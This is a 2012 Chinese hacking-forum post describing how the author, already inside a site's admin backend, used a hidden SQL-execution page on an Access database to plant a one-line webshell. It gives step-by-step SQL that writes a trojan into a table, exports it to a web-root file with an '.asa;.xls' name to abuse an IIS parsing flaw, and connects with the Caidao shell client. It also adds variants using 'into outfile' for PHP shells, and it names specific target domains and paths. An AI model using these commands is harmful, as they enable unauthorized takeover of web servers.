找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2008|回复: 0
打印 上一主题 下一主题

ACCESS执行SQL命令导出一句话SHELL

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:53:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好不容易进了后台,发现啥上传啊。备份啊多木有。4 _! F: `( P& C+ s) s1 ^/ _
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的! `5 }! W" h' g9 A: N  d
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,. L* V" A5 b( Q! _+ A4 [
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
0 C$ V' U2 c. w$ @' k; q6 c! h1.create table cmd (a varchar(50))  s! N( Z5 \- h+ K
2.insert into cmd (a) values (‘‘)
; E$ ]1 x1 v' Q2 i! I$ E! Z/ u3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd9 Q$ C0 d! k& W  z
(把表cmd的内容导出为物理路径的一个EXCEL文件)
0 e4 V& a2 e$ g& {/ c' [* @4.drop table cmd2 I$ j" @+ _# I' h
利用IIS的BUG成功拿到了WEBSHELL。
# Y, I' ], w: X# B. ?% n+ k( P% o, F. R& b8 I7 n$ ?2 N
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
5 B0 A, \6 I8 P5 |6 @) t# s$ U$ A$ Y* V. H
  SQL语句意思解释:
6 h9 c) s) U" w9 S4 w* Q  第一句9 Y# U: o; P: }  w# q$ h
  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
. \: z$ b+ n9 P
, @. X' Y% O" o& N! L# {7 g  第二句  g* n% l0 Y. o
  在表cmd的a字段插入一句话木马
$ q9 S) A! B7 C/ [  第三句. [8 \& m; G7 Q8 G7 g
  把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
1 B+ L8 r  o5 w9 N7 A
1 D! Q, h' g3 L9 i" k2 u# b  第四句# q3 R# J" _# G8 f9 v
  删除建立的cmd表
: V4 k  G% V8 |& S
9 E& @& a2 b: x/ H  以下内容为测试:
! b( B, i0 o8 r! G" Z  Access利用后台SQL执行命令功能导出WebShell:9 s' d6 O, s( R0 T. q
  这个更简单:! J7 @7 U! t! @# s9 H
  [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]4 r1 y( Z7 d. f! U
  或者  f: q' }7 l' n& G
  [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
) C, D$ ]* D- x9 c6 j3 [3 A( }7 G; Z6 _
  后台有执行SQL语句功能(vote为已知表段)# b! y" I5 S6 J7 k( Y, c7 C6 c- j
  希望对大家有所帮助拿shell的又一个思路
+ R  d; [- N* T8 w3 T$ f
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表